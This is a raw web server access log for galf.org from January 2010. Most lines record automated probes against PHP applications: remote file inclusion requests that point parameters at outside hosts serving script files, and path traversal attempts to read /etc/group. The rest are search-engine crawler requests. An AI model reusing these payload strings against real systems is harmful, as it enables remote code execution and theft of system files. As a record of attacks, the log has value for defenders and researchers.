194.105.128.135 - - [03/Jan/2010:18:22:03 -0800] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
81.12.13.152 - - [03/Jan/2010:18:22:39 -0800] "GET //vwar/backup/errors.php?error=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.12.13.152 - - [03/Jan/2010:18:22:39 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.12.13.152 - - [03/Jan/2010:18:22:39 -0800] "GET /logs///vwar/backup/errors.php?error=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.19.116.18 - - [03/Jan/2010:18:28:42 -0800] "GET /logs/access_090803.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:18:28:42 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:18:28:42 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:18:28:43 -0800] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:18:30:58 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [03/Jan/2010:18:33:44 -0800] "GET /labia/ HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:18:38:39 -0800] "GET /logs/access_090810.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.116.18 - - [03/Jan/2010:18:38:40 -0800] "GET /logs/access_090803.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.chicagofc.co.kr/fitness/data/come11/fx29id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:18:42:43 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:18:42:43 -0800] "GET /logs/access_090810.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:18:42:43 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:18:42:46 -0800] "GET /logs/access_090810.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:18:42:46 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:18:42:46 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:18:43:54 -0800] "GET /logs/access_090817.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:18:43:54 -0800] "GET /logs/access_090817.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:18:44:57 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:18:44:57 -0800] "GET /logs/access_090817.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:18:44:57 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:18:44:58 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:18:44:58 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:18:44:58 -0800] "GET /logs/access_090817.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:18:45:19 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:18:45:19 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:18:45:19 -0800] "GET /logs/access_091228.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:18:45:25 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:18:45:25 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:18:45:25 -0800] "GET /logs/access_091228.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:18:49:12 -0800] "GET /logs//surveys/survey.inc.php?path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:18:49:12 -0800] "GET /surveys/survey.inc.php?path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:18:49:12 -0800] "GET /logs/access_090914.log//surveys/survey.inc.php?path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:18:49:16 -0800] "GET /logs//surveys/survey.inc.php?path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:18:49:16 -0800] "GET /surveys/survey.inc.php?path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:18:49:16 -0800] "GET /logs/access_090914.log%20%20//surveys/survey.inc.php?path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [03/Jan/2010:18:49:17 -0800] "GET /logs/access_090420.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:18:49:56 -0800] "GET /logs/access_090914.log//surveys/survey.inc.php?path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:18:49:56 -0800] "GET /surveys/survey.inc.php?path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:18:49:56 -0800] "GET /logs//surveys/survey.inc.php?path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:18:51:05 -0800] "GET /logs/access_091026.log%20%20//surveys/survey.inc.php?path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:18:51:29 -0800] "GET /logs/access_091026.log//surveys/survey.inc.php?path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.53.110.2 - - [03/Jan/2010:18:52:17 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
74.53.110.2 - - [03/Jan/2010:18:52:17 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
74.53.110.2 - - [03/Jan/2010:18:53:50 -0800] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
74.53.110.2 - - [03/Jan/2010:18:53:50 -0800] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.105.128.135 - - [03/Jan/2010:18:53:52 -0800] "GET /logs/access_090921.log//common/db.php?commonpath=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
194.105.128.135 - - [03/Jan/2010:18:53:52 -0800] "GET /logs//common/db.php?commonpath=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
194.105.128.135 - - [03/Jan/2010:18:53:52 -0800] "GET /common/db.php?commonpath=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
194.105.128.135 - - [03/Jan/2010:18:53:52 -0800] "GET /logs/access_090525.log//common/db.php?commonpath=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
194.105.128.135 - - [03/Jan/2010:18:55:05 -0800] "GET /logs/access_090615.log%20//common/db.php?commonpath=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
67.195.37.161 - - [03/Jan/2010:18:58:34 -0800] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:19:00:05 -0800] "GET /logs/access_091116.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:19:00:05 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:19:00:05 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:19:00:05 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:19:00:05 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:19:00:05 -0800] "GET /logs/access_091116.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:19:00:15 -0800] "GET /logs/access_091116.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:19:00:15 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:19:00:15 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:19:00:16 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:19:00:16 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:19:00:16 -0800] "GET /logs/access_091116.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:19:00:44 -0800] "GET /logs/access_090622.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:19:00:54 -0800] "GET /logs/access_090622.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:19:01:17 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:19:01:17 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:19:01:17 -0800] "GET /logs/access_091116.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:19:01:17 -0800] "GET /logs/access_091116.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:19:01:17 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:19:01:17 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:19:01:42 -0800] "GET /logs/access_090622.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.23 - - [03/Jan/2010:19:01:43 -0800] "GET /logs/access_090622.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.141.18.221 - - [03/Jan/2010:19:02:14 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.141.18.221 - - [03/Jan/2010:19:02:14 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.141.18.221 - - [03/Jan/2010:19:02:20 -0800] "GET /logs/access_091012.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.141.18.221 - - [03/Jan/2010:19:02:34 -0800] "GET /logs/access_090525.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:19:09:34 -0800] "GET /component/option%252Ccom_virtuemart//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:19:09:34 -0800] "GET /logs//component/option%252Ccom_virtuemart//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [03/Jan/2010:19:09:35 -0800] "GET /logs/access_091221.log//component/option%252Ccom_virtuemart//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://koalisi.org/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.54 - - [03/Jan/2010:19:12:30 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=63&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; H010818)" "www.galf.org"
87.250.252.242 - - [03/Jan/2010:19:18:20 -0800] "GET /cendoc/ HTTP/1.1" 200 526 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
65.55.107.180 - - [03/Jan/2010:19:20:54 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.107.180 - - [03/Jan/2010:19:28:15 -0800] "GET /cendoc/?S=A HTTP/1.1" 200 526 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:19:35:14 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.37.199.41 - - [03/Jan/2010:19:35:14 -0800] "GET /logs/access.log%20%20/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.37.199.41 - - [03/Jan/2010:19:35:14 -0800] "GET /logs/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.37.199.41 - - [03/Jan/2010:19:35:15 -0800] "GET /logs/access.log%20%20/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.37.199.41 - - [03/Jan/2010:19:35:15 -0800] "GET /logs/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.37.199.41 - - [03/Jan/2010:19:35:15 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.37.199.41 - - [03/Jan/2010:19:35:37 -0800] "GET /logs/access_091228.log%20%20/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:19:35:37 -0800] "GET /logs/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:19:35:37 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:19:35:39 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:19:35:39 -0800] "GET /logs/access_091228.log%20%20/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [03/Jan/2010:19:35:39 -0800] "GET /logs/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.53.110.2 - - [03/Jan/2010:19:36:33 -0800] "GET /logs/access_091221.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
74.53.110.2 - - [03/Jan/2010:19:36:33 -0800] "GET /logs/access_091221.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
69.36.2.101 - - [03/Jan/2010:19:38:28 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.qqe.ru/forum/Themes/id1.asp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.36.2.101 - - [03/Jan/2010:19:38:28 -0800] "GET /logs/access_090810.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.qqe.ru/forum/Themes/id1.asp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.36.2.101 - - [03/Jan/2010:19:38:28 -0800] "GET /logs/access_091221.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.qqe.ru/forum/Themes/id1.asp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.36.2.101 - - [03/Jan/2010:19:38:28 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.qqe.ru/forum/Themes/id1.asp?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.53.110.2 - - [03/Jan/2010:19:42:29 -0800] "GET /logs/access.log%20//modules/Forums/admin/admin_styles.php?phpbb_root_path=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
74.53.110.2 - - [03/Jan/2010:19:42:29 -0800] "GET /logs/access.log%20//modules/Forums/admin/admin_styles.php?phpbb_root_path=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
65.55.51.69 - - [03/Jan/2010:19:44:16 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.51.69 - - [03/Jan/2010:19:46:02 -0800] "GET /logs/access_090525.log HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
194.105.128.135 - - [03/Jan/2010:19:49:04 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
194.105.128.135 - - [03/Jan/2010:19:49:04 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
194.105.128.135 - - [03/Jan/2010:19:49:04 -0800] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
61.47.7.71 - - [03/Jan/2010:19:58:15 -0800] "GET /logs/access_090713.log%20%20/send_reminders.php?includedir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [03/Jan/2010:19:58:15 -0800] "GET /send_reminders.php?includedir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [03/Jan/2010:19:58:15 -0800] "GET /logs/send_reminders.php?includedir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [03/Jan/2010:19:58:29 -0800] "GET /logs/access_091228.log%20%20/send_reminders.php?includedir=http://190.12.77.105:83/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
